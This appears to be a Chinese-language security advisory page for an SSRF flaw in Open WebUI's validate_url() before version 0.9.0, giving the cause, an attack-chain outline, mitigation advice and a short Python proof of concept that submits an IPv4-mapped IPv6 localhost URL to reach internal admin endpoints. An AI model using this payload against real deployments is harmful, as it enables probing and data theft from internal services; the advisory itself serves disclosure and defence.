CVE-2026-45331 CVSS 8.5 高危

CVE-2026-45331 Open WebUI 服务器端请求伪造漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45331

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管AI平台。在0.9.0版本前，其validate_url()函数存在严重缺陷。由于validators库未正确处理IPv6的private参数，导致所有IPv6地址通过验证。同时，IPv4映射的IPv6地址及特定保留IPv4范围可绕过检查。攻击者可利用此漏洞访问内网资源，造成信息泄露风险。

技术细节

该漏洞主要源于Open WebUI对URL中IP地址验证的逻辑缺陷。首先，代码调用`validators.ipv6(ip, private=True)`时，因库不支持该参数抛出异常，异常被判定为假值，导致所有IPv6地址（包括内网地址）被错误允许。其次，利用IPv4映射的IPv6地址（如`::ffff:192.168.1.1`）可完全绕过IPv4过滤规则。此外，0.0.0.0/8等保留网段也未被封禁。攻击者可通过构造包含恶意内网地址的URL，诱导服务器向内网发起请求，从而探测或攻击内部服务，结合CVSS评分，此漏洞对机密性影响较高，导致严重的数据泄露风险。

攻击链分析

STEP 1

1. 侦察

攻击者发现目标正在运行Open WebUI，且版本低于0.9.0。

STEP 2

2. 构造Payload

攻击者构造包含IPv4映射IPv6地址（如::ffff:127.0.0.1）或未过滤保留IP段的恶意URL。

STEP 3

3. 发送请求

攻击者通过应用程序功能（如检索功能）提交包含恶意URL的请求。

STEP 4

4. 绕过验证

服务器的validate_url()函数因异常处理不当，错误地放行了该内部地址。

STEP 5

5. 执行攻击

Open WebUI服务器向内网目标发起请求，返回敏感信息或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://localhost:8080/api/retrieve"

# Malicious payload using IPv4-mapped IPv6 to access localhost
# This bypasses the IPv4 check due to the described vulnerability
malicious_url = "http://[::ffff:127.0.0.1]:80/admin"

payload = {
    "url": malicious_url
}

# Send the request
response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("[+] Potential SSRF successful. Response received:")
    print(response.text)
else:
    print("[-] Request failed or blocked.")

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

如果无法立即升级，建议在应用层代理或防火墙中严格过滤请求URL中的IPv6地址及保留的IPv4地址段，并禁止服务器访问非必要的外部网络。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表